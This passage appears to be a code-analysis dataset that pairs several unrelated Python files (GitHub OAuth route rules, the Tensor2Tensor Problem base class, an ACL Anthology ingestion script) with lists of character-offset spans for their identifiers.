json_renderer,
endpoint_suffix='__user',
),
Rule(
'/settings/github/oauth/',
'delete',
views.auth.github_oauth_delete_user,
json_renderer,
),
# OAuth: Node
Rule(
[
'/project/<pid>/github/oauth/',
'/project/<pid>/node/<nid>/github/oauth/',
],
'get',
views.auth.github_oauth_start,
json_renderer,
),
Rule(
[
'/project/<pid>/github/user_auth/',
'/project/<pid>/node/<nid>/github/user_auth/',
],
'post',
views.auth.github_add_user_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/github/oauth/',
'/project/<pid>/node/<nid>/github/oauth/',
'/project/<pid>/github/config/',
'/project/<pid>/node/<nid>/github/config/'
],
'delete',
views.auth.github_oauth_deauthorize_node,
json_renderer,
),
# OAuth: General
Rule(
[
'/addons/github/callback/<uid>/',
'/addons/github/callback/<uid>/<nid>/',
],
'get',
views.auth.github_oauth_callback,
json_renderer,
),
],
'prefix': '/api/v1',
}
api_routes = {
'rules': [
Rule(
[
'/project/<pid>/github/newrepo/',
'/project/<pid>/node/<nid>/github/newrepo/',
],
'post',
views.repos.github_create_repo,
json_renderer,
),
Rule(
[
'/project/<pid>/github/hgrid/',
'/project/<pid>/node/<nid>/github/hgrid/',
'/project/<pid>/github/hgrid/<path:path>/',
'/project/<pid>/node/<nid>/github/hgrid/<path:path>/',
],
'get',
views.hgrid.github_hgrid_data_contents,
json_renderer,
),
Rule(
[
'/project/<pid>/github/hgrid/root/',
'/project/<pid>/node/<nid>/github/hgrid/root/',
],
'get',
views.hgrid.github_root_folder_public,
json_renderer,
),
],
'prefix': '/api/v1'
}
| [
[
[
55,
59
],
[
185,
189
],
[
444,
448
],
[
702,
706
],
[
1082,
1086
],
[
1334,
1338
],
[
1663,
1667
],
[
1993,
1997
],
[
2269,
2273
],
[
2460,
2464
],
[
2645,
2649
],
[
2895,
2899
],
[
3157,
3161
],
[
3556,
3560
],
[
3874,
3878
],
[
4132,
4136
],
[
4522,
4526
]
],
[
[
61,
74
],
[
409,
422
],
[
667,
680
],
[
1047,
1060
],
[
1298,
1311
],
[
1560,
1573
],
[
1889,
1902
],
[
2211,
2224
],
[
2388,
2401
],
[
2588,
2601
],
[
2861,
2874
],
[
3122,
3135
],
[
3496,
3509
],
[
3774,
3787
],
[
4097,
4110
],
[
4488,
4501
],
[
4756,
4769
]
],
[
[
110,
115
],
[
365,
370
],
[
623,
628
],
[
993,
998
],
[
1255,
1260
],
[
1511,
1516
],
[
1840,
1845
],
[
2165,
2170
],
[
2345,
2350
],
[
2539,
2544
],
[
2818,
2823
],
[
3077,
3082
],
[
3442,
3447
],
[
3728,
3733
],
[
4053,
4058
],
[
4436,
4441
],
[
4705,
4710
]
],
[
[
117,
132
]
],
[
[
3835,
3845
]
]
] |
import matplotlib.pyplot as plt
from math import pi
import numpy as np
| [
[
[
7,
31
]
],
[
[
49,
51
]
],
[
[
59,
70
]
]
] |
# coding=utf-8
# Copyright 2017 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for problem/dataset definitions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import random
# Dependency imports
import six
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.utils import metrics
from tensor2tensor.utils import registry
import tensorflow as tf
class SpaceID(object):
"""Input and target space ids. Add more as needed."""
# Generic / unknown output space (default)
GENERIC = 0
# Image labels
IMAGE_LABEL = 1
# English characters
EN_CHR = 2
# English tokens
EN_TOK = 3
# English bpe tokens
EN_BPE_TOK = 4
# French characters
FR_CHR = 5
# French tokens
FR_TOK = 6
# German characters
DE_CHR = 7
# German tokens
DE_TOK = 8
# German bpe tokens
DE_BPE_TOK = 9
# Digit cipher lexicon 0
DIGIT_0 = 10
# Digit cipher lexicon 1
DIGIT_1 = 11
# Audio waveform domain
AUDIO_WAV = 12
# Audio spectral domain
AUDIO_SPECTRAL = 13
# Parse characters
PARSE_CHR = 14
# Parse tokens
PARSE_TOK = 15
# Chinese tokens
ZH_TOK = 16
# Icelandic characters
ICE_CHAR = 17
# Icelandic tokens
ICE_TOK = 18
# Icelandic parse tokens
ICE_PARSE_TOK = 19
# Macedonian tokens
MK_TOK = 20
# Czech tokens
CS_TOK = 21
# Czech characters
CS_CHR = 22
# Genetic bases (ACTG)
DNA = 23
# Real numbers
REAL = 24
# Images
IMAGE = 25
# Peptide
PEPTIDE = 26
# Python
PY_TOK = 27
# C++
CPP_TOK = 28
# Strokes
STROKES = 29
# Pickled Python
PICKLED_PYTHON = 30
def default_model_hparams():
return tf.contrib.training.HParams(
max_input_seq_length=0,
max_target_seq_length=0,
prepend_mode="none",
data_dir=None)
def preprocess_example_common(example, hparams, mode):
"""Preprocessing steps common to all models."""
if hparams.max_input_seq_length > 0:
example["inputs"] = example["inputs"][:hparams.max_input_seq_length]
if hparams.max_target_seq_length > 0:
example["targets"] = example["targets"][:hparams.max_target_seq_length]
if hparams.prepend_mode != "none":
if mode == tf.estimator.ModeKeys.PREDICT:
example["partial_targets"] = tf.concat([example["inputs"], [0]], 0)
else:
example["targets"] = tf.concat(
[example["inputs"], [0], example["targets"]], 0)
return example
class Problem(object):
"""Problem base class. Specifies a T2T problem.
Problems unify the specification of a problem for data generation, training,
and inference.
New problems are specified by the following methods:
Data generation:
* generate_data(data_dir, tmp_dir)
- Generate training and dev datasets into data_dir.
- Additional files, e.g. vocabulary files, should also be written to
data_dir. Vocab files are newline-separated files with each line
containing a token. The standard convention for the filename is to
set it to be
${Problem.vocab_name}.${Problem.targeted_vocab_size}
- Downloads and other files can be written to tmp_dir
- If you have a training and dev generator, you can generate the
training and dev datasets with
generator_utils.generate_dataset_and_shuffle.
- Use the self.training_filepaths and self.dev_filepaths functions to
get sharded filenames. If shuffled=False, the filenames will contain
an "unshuffled" suffix; you should then shuffle the data
shard-by-shard with generator_utils.shuffle_dataset.
- Allows to specify the number of shards, optionally (can be omitted).
- Subclasses must override
* dataset_filename()
- Base filename for problem.
- Defaults to registered name (self.name).
Training:
* hparams(defaults, model_hparams)
- Specify the problem hyperparameters (see _default_hparams)
- Mutate defaults as needed
* example_reading_spec
- Specify the names and types of the features on disk.
- Specify tf.contrib.slim.tfexample_decoder
* preprocess_example(example, mode)
- Preprocess the example feature dict from feature name to Tensor or
SparseTensor.
- Used in training, eval, and inference (specified by mode).
Eval:
* eval_metrics
- Specify the set of evaluation metrics for this problem.
Inference:
* feature_encoders(data_dir)
- Return a dict of <feature name, TextEncoder> for encoding and decoding
inference input/output.
- Defaults to TextEncoder for inputs and targets.
"""
# ============================================================================
# BEGIN SUBCLASS INTERFACE
# ============================================================================
def generate_data(self, data_dir, tmp_dir, task_id=-1):
raise NotImplementedError()
def hparams(self, defaults, model_hparams):
pass
def dataset_filename(self):
return self.name
def feature_encoders(self, data_dir):
del data_dir
return {
"inputs": text_encoder.TextEncoder(),
"targets": text_encoder.TextEncoder()
}
def example_reading_spec(self):
data_fields = {
"inputs": tf.VarLenFeature(tf.int64),
"targets": tf.VarLenFeature(tf.int64)
}
data_items_to_decoders = None
return (data_fields, data_items_to_decoders)
def preprocess_example(self, example, mode, hparams):
return preprocess_example_common(example, hparams, mode)
def eval_metrics(self):
return [
metrics.Metrics.ACC, metrics.Metrics.ACC_TOP5,
metrics.Metrics.ACC_PER_SEQ, metrics.Metrics.NEG_LOG_PERPLEXITY
]
# ============================================================================
# END SUBCLASS INTERFACE
# ============================================================================
def training_filepaths(self, data_dir, num_shards, shuffled):
file_basename = self.dataset_filename()
if not shuffled:
file_basename += generator_utils.UNSHUFFLED_SUFFIX
return generator_utils.train_data_filenames(file_basename, data_dir,
num_shards)
def dev_filepaths(self, data_dir, num_shards, shuffled):
file_basename = self.dataset_filename()
if not shuffled:
file_basename += generator_utils.UNSHUFFLED_SUFFIX
return generator_utils.dev_data_filenames(file_basename, data_dir,
num_shards)
def test_filepaths(self, data_dir, num_shards, shuffled):
file_basename = self.dataset_filename()
if not shuffled:
file_basename += generator_utils.UNSHUFFLED_SUFFIX
return generator_utils.test_data_filenames(file_basename, data_dir,
num_shards)
def filepattern(self, data_dir, mode, shard=None):
"""Get filepattern for data files for mode.
Matches mode to a suffix.
* TRAIN: train
* EVAL: dev
* PREDICT: dev
* test: test
Args:
data_dir: str, data directory.
mode: tf.estimator.ModeKeys or "test".
shard: int, if provided, will only read data from the specified shard.
Returns:
filepattern str
"""
path = os.path.join(data_dir, self.dataset_filename())
shard_str = "-%05d" % shard if shard is not None else ""
if mode == tf.estimator.ModeKeys.TRAIN:
suffix = "train"
elif mode in [tf.estimator.ModeKeys.EVAL, tf.estimator.ModeKeys.PREDICT]:
suffix = "dev"
else:
assert mode == "test"
suffix = "test"
return "%s-%s%s*" % (path, suffix, shard_str)
def __init__(self, was_reversed=False, was_copy=False):
"""Create a Problem.
Args:
was_reversed: bool, whether to reverse inputs and targets.
was_copy: bool, whether to copy inputs to targets. Can be composed with
was_reversed so that if both are true, the targets become the inputs,
which are then copied to targets so that the task is targets->targets.
"""
self._was_reversed = was_reversed
self._was_copy = was_copy
self._encoders = None
self._hparams = None
self._feature_info = None
def get_feature_encoders(self, data_dir=None):
if self._encoders is None:
self._encoders = self.feature_encoders(data_dir)
return self._encoders
def get_hparams(self, model_hparams=None):
"""Returns problem_hparams."""
if self._hparams is not None:
return self._hparams
if self._encoders is None:
data_dir = (model_hparams and model_hparams.data_dir) or None
self.get_feature_encoders(data_dir)
hp = _default_hparams()
ret = self.hparams(hp, model_hparams)
if ret is not None:
raise ValueError("The Problem subclass hparams function should mutate "
"the defaults passed in and return None.")
hp.add_hparam("vocabulary", self._encoders)
hp.add_hparam("was_reversed", self._was_reversed)
hp.add_hparam("was_copy", self._was_copy)
if self._was_reversed:
_reverse_problem_hparams(hp)
if self._was_copy:
_copy_problem_hparams(hp)
self._hparams = hp
return self._hparams
def maybe_reverse_features(self, feature_map):
if not self._was_reversed:
return
inputs, targets = feature_map["inputs"], feature_map["targets"]
feature_map["inputs"], feature_map["targets"] = targets, inputs
def maybe_copy_features(self, feature_map):
if not self._was_copy:
return
feature_map["targets"] = feature_map["inputs"]
def dataset(self,
mode,
data_dir=None,
num_threads=None,
output_buffer_size=None,
shuffle_files=None,
hparams=None,
preprocess=True,
dataset_split=None,
shard=None):
"""Build a Dataset for this problem.
Args:
mode: tf.estimator.ModeKeys; determines which files to read from.
data_dir: directory that contains data files.
num_threads: int, number of threads to use for decode and preprocess
Dataset.map calls.
output_buffer_size: int, how many elements to prefetch in Dataset.map
calls.
shuffle_files: whether to shuffle input files. Default behavior (i.e. when
shuffle_files=None) is to shuffle if mode == TRAIN.
hparams: tf.contrib.training.HParams; hparams to be passed to
Problem.preprocess_example and Problem.hparams. If None, will use a
default set that is a no-op.
preprocess: bool, whether to map the Dataset through
Problem.preprocess_example.
dataset_split: tf.estimator.ModeKeys + ["test"], which split to read data
from (TRAIN:"-train", EVAL:"-dev", "test":"-test"). Defaults to mode.
shard: int, if provided, will only read data from the specified shard.
Returns:
Dataset containing dict<feature name, Tensor>.
"""
dataset_split = dataset_split or mode
assert data_dir
if hparams is None:
hparams = default_model_hparams()
if not hasattr(hparams, "data_dir"):
hparams.add_hparam("data_dir", data_dir)
if not hparams.data_dir:
hparams.data_dir = data_dir
# Construct the Problem's hparams so that items within it are accessible
_ = self.get_hparams(hparams)
data_fields, data_items_to_decoders = self.example_reading_spec()
if data_items_to_decoders is None:
data_items_to_decoders = {
field: tf.contrib.slim.tfexample_decoder.Tensor(field)
for field in data_fields
}
is_training = mode == tf.estimator.ModeKeys.TRAIN
data_filepattern = self.filepattern(data_dir, dataset_split, shard=shard)
tf.logging.info("Reading data files from %s", data_filepattern)
data_files = tf.contrib.slim.parallel_reader.get_data_files(
data_filepattern)
if shuffle_files or shuffle_files is None and is_training:
random.shuffle(data_files)
dataset = tf.contrib.data.TFRecordDataset(data_files)
def decode_record(record):
"""Serialized Example to dict of <feature name, Tensor>."""
decoder = tf.contrib.slim.tfexample_decoder.TFExampleDecoder(
data_fields, data_items_to_decoders)
decode_items = list(data_items_to_decoders)
decoded = decoder.decode(record, items=decode_items)
return dict(zip(decode_items, decoded))
def _preprocess(example):
example = self.preprocess_example(example, mode, hparams)
self.maybe_reverse_features(example)
self.maybe_copy_features(example)
return example
dataset = dataset.map(decode_record, num_threads=num_threads)
if preprocess:
dataset = dataset.map(
_preprocess,
num_threads=num_threads,
output_buffer_size=output_buffer_size)
return dataset
@property
def has_inputs(self):
return "inputs" in self.get_feature_encoders()
@property
def feature_info(self):
"""Retrieve dict<feature name, FeatureInfo>.
Must first call Problem.get_hparams or Problem.dataset to have the problem's
internal hparams already constructed.
Returns:
dict<feature name, FeatureInfo>
"""
if self._feature_info is not None:
return self._feature_info
assert self._hparams is not None
hp = self.get_hparams()
input_mods = hp.input_modality
target_mod = hp.target_modality
vocabs = hp.vocabulary
if self.has_inputs:
in_id = hp.input_space_id
out_id = hp.target_space_id
features = collections.defaultdict(FeatureInfo)
for name, mod_spec in six.iteritems(input_mods):
mod, vocab_size = mod_spec
finfo = features[name]
finfo.modality = mod
finfo.vocab_size = vocab_size
mod, vocab_size = target_mod
features["targets"].modality = mod
features["targets"].vocab_size = vocab_size
for name, encoder in six.iteritems(vocabs):
features[name].encoder = encoder
if self.has_inputs:
features["inputs"].space_id = in_id
features["targets"].space_id = out_id
self._feature_info = features
return features
class FeatureInfo(object):
def __init__(self,
encoder=None,
modality=None,
vocab_size=None,
space_id=None):
self.encoder = encoder
self.modality = modality
self.vocab_size = vocab_size
self.space_id = space_id
def _copy_problem_hparams(p_hparams):
"""Use input modality, vocab, and space id for target."""
p = p_hparams
# Duplicate input modality.
p.target_modality = p.input_modality["inputs"]
# Duplicate input vocabulary.
p.vocabulary["targets"] = p.vocabulary["inputs"]
# Duplicate input space ids.
p.target_space_id = p.input_space_id
  # Mark that p is a copy.
p.was_copy = True
def _reverse_problem_hparams(p_hparams):
"""Swap input/output modalities, vocab, and space ids."""
p = p_hparams
# Swap modalities.
input_modality = p.input_modality["inputs"]
target_modality = p.target_modality
p.input_modality["inputs"] = target_modality
p.target_modality = input_modality
# Swap vocabularies.
input_vocabulary = p.vocabulary["inputs"]
target_vocabulary = p.vocabulary["targets"]
p.vocabulary["inputs"] = target_vocabulary
p.vocabulary["targets"] = input_vocabulary
# Swap input/target space ids.
input_space_id = p.input_space_id
target_space_id = p.target_space_id
p.input_space_id = target_space_id
p.target_space_id = input_space_id
# Mark that p was reversed.
p.was_reversed = True
def _default_hparams():
"""A set of basic model hyperparameters."""
return tf.contrib.training.HParams(
# Use this parameter to get comparable perplexity numbers with different
# tokenizations. This value should be set to the ratio of the number of
# tokens in the test set according to the tokenization used to the number
# of tokens in the test set in the "official" tokenization. For
# example, if we are using a word-piece based model and we want to
# compute per-word perplexity, then we set loss_multiplier to the number
# of wordpieces per word in the test set.
loss_multiplier=1.0,
# Use this parameter to allow for larger sequences in the batch. Without
# the use of this parameter, the size of the inner two dimensions will
# be used to judge the sequence length.
batch_size_multiplier=1,
# To make queues of the right capacity, it's good to know the maximal
# expected batch size, as it can vary a lot. It only affects performance
# of input readers and memory use. The defaults should be safe and fast,
# but decrease if your reader uses a lot of memory and increase if slow.
max_expected_batch_size_per_shard=64,
# During inference for autoregressive problems, if the batch_size is 1,
# the inference will stop when the model predict a text_encoder.EOS_ID
# token.
stop_at_eos=False,
# Modalities used to map from input features to a space compatible with
# chosen model architecture. One modality spec (which is a 2-tuple,
# (modality_full_name, vocab_size)) per feature key. modality_full_name
# is a string type:name, e.g. class_label:class_label_2d. Leaving off
# the name uses the default modality for that type (e.g. class_label ==
# class_label:default).
input_modality={},
# Modality used to map from hidden representation to the target space.
# Specified as a modality spec, a 2-tuple described above.
target_modality=None,
# Identifiers used to tell the model which input/target space will be
# expected. For example, it can tell that we expect French as characters
# as output, or Spanish as sound. Spaces defined as constants in SpaceID
# class.
input_space_id=SpaceID.GENERIC,
target_space_id=SpaceID.GENERIC)
class Text2TextProblem(Problem):
"""Base class for text-to-text problems."""
@property
def is_character_level(self):
"""Whether the inputs and targets are sequences of characters."""
raise NotImplementedError()
@property
def targeted_vocab_size(self):
raise NotImplementedError() # Not needed if self.is_character_level.
def generator(self, data_dir, tmp_dir, is_training):
"""Generator for the training and evaluation data.
Args:
data_dir: The directory in which to assets, e.g. the vocab file.
tmp_dir: A scratch directory (if needed).
is_training: A boolean indicating if we should generate training data
(True) or dev set data (False).
Yields:
dicts with keys "inputs" and "targets", with values being lists of token
ids.
"""
raise NotImplementedError()
@property
def use_train_shards_for_dev(self):
"""If true, we only generate training data and hold out shards for dev."""
return False
@property
def input_space_id(self):
raise NotImplementedError()
@property
def target_space_id(self):
raise NotImplementedError()
@property
def num_shards(self):
raise NotImplementedError()
@property
def num_dev_shards(self):
return 1
@property
def vocab_name(self):
raise NotImplementedError()
@property
def vocab_file(self):
return "%s.%d" % (self.vocab_name, self.targeted_vocab_size)
@property
def use_subword_tokenizer(self):
raise NotImplementedError()
@property
def has_inputs(self):
return True # Set to False for language models.
def generate_data(self, data_dir, tmp_dir, task_id=-1):
train_paths = self.training_filepaths(
data_dir, self.num_shards, shuffled=False)
dev_paths = self.dev_filepaths(
data_dir, self.num_dev_shards, shuffled=False)
if self.use_train_shards_for_dev:
all_paths = train_paths + dev_paths
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, True), all_paths)
generator_utils.shuffle_dataset(all_paths)
else:
generator_utils.generate_dataset_and_shuffle(
self.generator(data_dir, tmp_dir, True), train_paths,
self.generator(data_dir, tmp_dir, False), dev_paths)
def feature_encoders(self, data_dir):
if self.is_character_level:
encoder = text_encoder.ByteTextEncoder()
elif self.use_subword_tokenizer:
vocab_filename = os.path.join(data_dir, self.vocab_file)
encoder = text_encoder.SubwordTextEncoder(vocab_filename)
else:
vocab_filename = os.path.join(data_dir, self.vocab_file)
encoder = text_encoder.TokenTextEncoder(vocab_filename)
if self.has_inputs:
return {"inputs": encoder, "targets": encoder}
return {"targets": encoder}
def hparams(self, defaults, unused_model_hparams):
p = defaults
p.stop_at_eos = int(True)
if self.has_inputs:
source_vocab_size = self._encoders["inputs"].vocab_size
p.input_modality = {
"inputs": (registry.Modalities.SYMBOL, source_vocab_size)
}
target_vocab_size = self._encoders["targets"].vocab_size
p.target_modality = (registry.Modalities.SYMBOL, target_vocab_size)
if self.has_inputs:
p.input_space_id = self.input_space_id
p.target_space_id = self.target_space_id
if self.is_character_level:
p.loss_multiplier = 2.0
def eval_metrics(self):
return [
metrics.Metrics.ACC, metrics.Metrics.ACC_TOP5,
metrics.Metrics.ACC_PER_SEQ, metrics.Metrics.NEG_LOG_PERPLEXITY,
metrics.Metrics.APPROX_BLEU, metrics.Metrics.ROUGE_2_F,
metrics.Metrics.ROUGE_L_F
]
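# ============================================================================
# ILLUSTRATIVE SKETCH (not part of the original module)
# ============================================================================
# A minimal registered problem wiring together the subclass interface that the
# Problem/Text2TextProblem docstrings above describe. The class name and the
# toy data are hypothetical; `registry.register_problem` and `SpaceID` are the
# same objects already imported/defined in this file.
@registry.register_problem
class TinyCopyCharacters(Text2TextProblem):
  """Toy character-level copy task, used purely as an interface example."""

  @property
  def is_character_level(self):
    return True

  @property
  def use_subword_tokenizer(self):
    return False

  @property
  def vocab_name(self):
    return "vocab.tiny_copy"

  @property
  def num_shards(self):
    return 1

  @property
  def use_train_shards_for_dev(self):
    return True

  @property
  def input_space_id(self):
    return SpaceID.EN_CHR

  @property
  def target_space_id(self):
    return SpaceID.EN_CHR

  def generator(self, data_dir, tmp_dir, is_training):
    del data_dir, tmp_dir, is_training  # the toy data needs no external assets
    for line in ["hello", "world"]:
      ids = [ord(c) + 2 for c in line]  # shift past the reserved PAD/EOS ids
      yield {"inputs": ids, "targets": ids}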
| [
[
[
679,
694
]
],
[
[
718,
726
]
],
[
[
750,
764
]
],
[
[
772,
783
],
[
14238,
14249
]
],
[
[
791,
793
],
[
7942,
7944
],
[
21089,
21091
],
[
21226,
21228
]
],
[
[
801,
807
],
[
12642,
12648
]
],
[
[
836,
839
],
[
14302,
14305
],
[
14601,
14604
]
],
[
[
882,
897
],
[
6721,
6736
],
[
6766,
6781
],
[
7036,
7051
],
[
7081,
7096
],
[
7348,
7363
],
[
7393,
7408
],
[
20577,
20592
],
[
20677,
20692
],
[
20736,
20751
]
],
[
[
940,
952
],
[
5771,
5783
],
[
5818,
5830
],
[
20998,
21010
],
[
21145,
21157
],
[
21282,
21294
]
],
[
[
985,
992
],
[
6253,
6260
],
[
6274,
6281
],
[
6308,
6315
],
[
6337,
6344
],
[
22085,
22092
],
[
22106,
22113
],
[
22140,
22147
],
[
22169,
22176
],
[
22213,
22220
],
[
22242,
22249
],
[
22277,
22284
]
],
[
[
1025,
1033
],
[
21673,
21681
],
[
21814,
21822
]
],
[
[
1041,
1057
],
[
2292,
2294
],
[
2817,
2819
],
[
2883,
2885
],
[
2959,
2961
],
[
5924,
5926
],
[
5941,
5943
],
[
5971,
5973
],
[
5988,
5990
],
[
8066,
8068
],
[
8136,
8138
],
[
8164,
8166
],
[
12190,
12192
],
[
12308,
12310
],
[
12418,
12420
],
[
12499,
12501
],
[
12683,
12685
],
[
16347,
16349
],
[
12841,
12843
]
],
[
[
1067,
1074
],
[
18583,
18590
],
[
18622,
18629
]
],
[
[
2258,
2279
],
[
11743,
11764
]
],
[
[
2436,
2461
],
[
6155,
6180
]
],
[
[
3054,
3061
],
[
18664,
18671
]
],
[
[
14835,
14846
],
[
14262,
14273
]
],
[
[
15124,
15145
],
[
9806,
9827
]
],
[
[
15522,
15546
],
[
9748,
9772
]
],
[
[
16272,
16288
],
[
9336,
9352
]
],
[
[
18647,
18663
]
]
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019, 2020 Matt Post <post@cs.jhu.edu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ingests data into the Anthology. It takes a list of one or more
ACLPUB proceedings/ directories and does the following:
- executes some basic sanity checks
- applies normalization to names and titles (e.g, fixed-case protection)
- generates the nested XML in the Anthology repository
- copies the PDFs and attachments into place for rsyncing to the server
Updated in March 2020, this script replaces:
- the old ingest.py (which converted the old ACLPUB flat XML format)
- anthologize.pl in ACLPUB
- anthology_xml.py in ACLPUB
"""
import argparse
import iso639
import os
import re
import readline
import shutil
import sys
import lxml.etree as etree
from collections import defaultdict, OrderedDict
from datetime import datetime
from normalize_anth import normalize
from anthology.bibtex import read_bibtex
from anthology.index import AnthologyIndex
from anthology.people import PersonName
from anthology.sigs import SIGIndex
from anthology.utils import (
make_simple_element,
build_anthology_id,
deconstruct_anthology_id,
indent,
compute_hash_from_file,
)
from anthology.venues import VenueIndex
from itertools import chain
from typing import Dict, Any
from slugify import slugify
def log(text: str, fake: bool = False):
message = "[DRY RUN] " if fake else ""
print(f"{message}{text}", file=sys.stderr)
def read_meta(path: str) -> Dict[str, Any]:
meta = {"chairs": []}
with open(path) as instream:
for line in instream:
if re.match(r"^\s*$", line):
continue
key, value = line.rstrip().split(" ", maxsplit=1)
if key.startswith("chair"):
meta["chairs"].append(value)
else:
meta[key] = value
if "volume" in meta and re.match(rf"^[a-z0-1]+$", meta["volume"]) is None:
raise Exception(f"Invalid volume key '{meta['volume']}' in {path}")
return meta
def maybe_copy(source_path, dest_path):
"""Copies the file if it's different from the target."""
if not os.path.exists(dest_path) or compute_hash_from_file(
source_path
) != compute_hash_from_file(dest_path):
log(f"Copying {source_path} -> {dest_path}", args.dry_run)
shutil.copyfile(source_path, dest_path)
def bib2xml(bibfilename, anthology_id):
"""
Moved here from ACLPUB's anthology_xml.py script.
"""
fields = [
'title',
'author',
'editor',
'booktitle',
'month',
'year',
'address',
'publisher',
'pages',
'abstract',
'url',
'doi',
'language',
]
try:
collection_id, volume_name, paper_no = deconstruct_anthology_id(anthology_id)
except ValueError:
print(f"Couldn't split {anthology_id}", file=sys.stderr)
sys.exit(1)
if paper_no == '':
return # skip the master bib file; we only process the individual files
bibdata = read_bibtex(bibfilename)
if len(bibdata.entries) != 1:
log(f"more than one entry in {bibfilename}")
bibkey, bibentry = bibdata.entries.items()[0]
if len(bibentry.fields) == 0:
log(f"parsing bib of paper {paper_no} failed")
sys.exit(1)
paper = make_simple_element("paper", attrib={"id": paper_no})
for field in list(bibentry.fields) + list(bibentry.persons):
if field not in fields:
log(f"unknown field {field}")
for field in fields:
if field in ['author', 'editor']:
if field in bibentry.persons:
for person in bibentry.persons[field]:
first_text = ' '.join(person.bibtex_first_names)
last_text = ' '.join(person.prelast_names + person.last_names)
if person.lineage_names:
last_text += ', ' + ' '.join(person.lineage_names)
# Don't distinguish between authors that have only a first name
# vs. authors that have only a last name; always make it a last name.
if last_text.strip() in [
'',
'-',
]: # Some START users have '-' for null
last_text = first_text
first_text = ''
name_node = make_simple_element(field, parent=paper)
make_simple_element("first", first_text, parent=name_node)
make_simple_element("last", last_text, parent=name_node)
else:
if field == 'url':
value = f"{anthology_id}"
elif field in bibentry.fields:
value = bibentry.fields[field]
elif field == 'bibtype':
value = bibentry.type
elif field == 'bibkey':
value = bibkey
else:
continue
try:
make_simple_element(field, text=value, parent=paper)
except:
print(
f"Couldn't process {bibfilename} for {anthology_id}", file=sys.stderr
)
sys.exit(2)
return paper
def main(args):
collections = defaultdict(OrderedDict)
volumes = {}
anthology_datadir = os.path.join(os.path.dirname(sys.argv[0]), "..", "data")
venue_index = VenueIndex(srcdir=anthology_datadir)
venue_keys = [venue["slug"].lower() for _, venue in venue_index.items()]
sig_index = SIGIndex(srcdir=anthology_datadir)
# Build list of volumes, confirm uniqueness
unseen_venues = []
for proceedings in args.proceedings:
meta = read_meta(os.path.join(proceedings, "meta"))
venue_abbrev = meta["abbrev"]
venue_slug = venue_index.get_slug(venue_abbrev)
if str(datetime.now().year) in venue_abbrev:
print(f"Fatal: Venue assembler put year in acronym: '{venue_abbrev}'")
sys.exit(1)
if re.match(r".*\d$", venue_abbrev) is not None:
print(
f"WARNING: Venue {venue_abbrev} ends in a number, this is probably a mistake"
)
if venue_slug not in venue_keys:
unseen_venues.append((venue_slug, venue_abbrev, meta["title"]))
meta["path"] = proceedings
meta["collection_id"] = collection_id = meta["year"] + "." + venue_slug
volume_name = meta["volume"].lower()
volume_full_id = f"{collection_id}-{volume_name}"
if volume_full_id in volumes:
print("Error: ")
collections[collection_id][volume_name] = {}
volumes[volume_full_id] = meta
if "sig" in meta:
print(
f"Add this line to {anthology_datadir}/sigs/{meta['sig'].lower()}.yaml:"
)
print(f" - {meta['year']}:")
print(f" - {volume_full_id} # {meta['booktitle']}")
# Make sure all venues exist
if len(unseen_venues) > 0:
for venue in unseen_venues:
slug, abbrev, title = venue
print(f"Creating venue '{abbrev}' ({title})")
venue_index.add_venue(abbrev, title)
venue_index.dump(directory=anthology_datadir)
# Copy over the PDFs and attachments
for volume, meta in volumes.items():
root_path = os.path.join(meta["path"], "cdrom")
collection_id = meta["collection_id"]
venue_name = meta["abbrev"].lower()
volume_name = meta["volume"].lower()
year = meta["year"]
pdfs_dest_dir = os.path.join(args.pdfs_dir, venue_name)
if not os.path.exists(pdfs_dest_dir):
os.makedirs(pdfs_dest_dir)
# copy the book
book_dest_path = (
os.path.join(pdfs_dest_dir, f"{collection_id}-{volume_name}") + ".pdf"
)
# try the standard filename, e.g., 2021.naacl-main.pdf
book_src_filename = f'{year}.{meta["abbrev"]}-{volume_name}.pdf'
book_src_path = os.path.join(root_path, book_src_filename)
if not os.path.exists(book_src_path):
# try a different filename, e.g., "NLP4CALL-2021.pdf"
book_src_filename = f'{meta["abbrev"]}-{year}.pdf'
book_src_path = os.path.join(root_path, book_src_filename)
if os.path.exists(book_src_path) and not args.dry_run:
maybe_copy(book_src_path, book_dest_path)
# copy the paper PDFs
pdf_src_dir = os.path.join(root_path, "pdf")
for pdf_file in os.listdir(pdf_src_dir):
# Skip . files
if os.path.basename(pdf_file).startswith("."):
continue
# names are {abbrev}{number}.pdf
match = re.match(rf".*\.(\d+)\.pdf", pdf_file)
if match is not None:
paper_num = int(match[1])
paper_id_full = f"{collection_id}-{volume_name}.{paper_num}"
bib_path = os.path.join(
root_path,
"bib",
pdf_file.replace("/pdf", "/bib/").replace(".pdf", ".bib"),
)
pdf_src_path = os.path.join(pdf_src_dir, pdf_file)
pdf_dest_path = os.path.join(
pdfs_dest_dir, f"{collection_id}-{volume_name}.{paper_num}.pdf"
)
if not args.dry_run:
maybe_copy(pdf_src_path, pdf_dest_path)
collections[collection_id][volume_name][paper_num] = {
"anthology_id": paper_id_full,
"bib": bib_path,
"pdf": pdf_dest_path,
"attachments": [],
}
# copy the attachments
if os.path.exists(os.path.join(root_path, "additional")):
attachments_dest_dir = os.path.join(args.attachments_dir, venue_name)
if not os.path.exists(attachments_dest_dir):
os.makedirs(attachments_dest_dir)
for attachment_file in os.listdir(os.path.join(root_path, "additional")):
if os.path.basename(attachment_file).startswith("."):
continue
attachment_file_path = os.path.join(
root_path, "additional", attachment_file
)
match = re.match(
